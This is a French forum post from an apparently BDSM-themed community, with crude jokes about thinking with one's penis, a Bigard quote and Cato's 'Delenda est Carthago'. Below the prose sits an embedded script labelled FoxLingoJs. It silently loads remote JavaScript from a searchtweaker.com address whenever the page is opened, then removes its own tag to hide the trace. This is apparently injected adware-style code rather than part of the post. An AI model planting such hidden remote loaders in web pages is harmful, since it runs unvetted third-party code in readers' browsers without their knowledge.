Affichage d'un seul post
theodorasubtv69

"On dit de certains hommes qu'ils ont une bite à la place du cerveau. Je considère que pour s'aventurer en terrain bdsm, il est préférable d'avoir un cerveau à la place de la bite. La bonne nouvelle, c'est que ça n'empêche pas de bander."

Vous connaissez la phrase de Bigard à cet effet "  Quand on pense avec sa bite, on ne pense pas grand chose, mais on est en sûr ! "  Si le comique en général me laisse froid, je dois dire que je trouve cette expression assez judicieuse.

Et il est vrai qu'on pense pas grand chose avec sa bite...  A part une obsession...  Les Dieux ont été sacrement farceurs quand ils nous ont créé avec cette attribut,  c'est une source inépuisable de tout et n'importe quoi. 

Mais bon, toute de façon, au début il y a eu le verbe,  ensuite la matière.   L'un précéde toujours l'autre.   Après chacun met ce qu'il veut dans son verbe.  

Car comme le dit si bien Caton "  Delenda est Carthago " !

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]></script>
Dernière modification le 14/11/2012 04:06:10 par theodorasubtv69.
1 personne aime(nt) ça.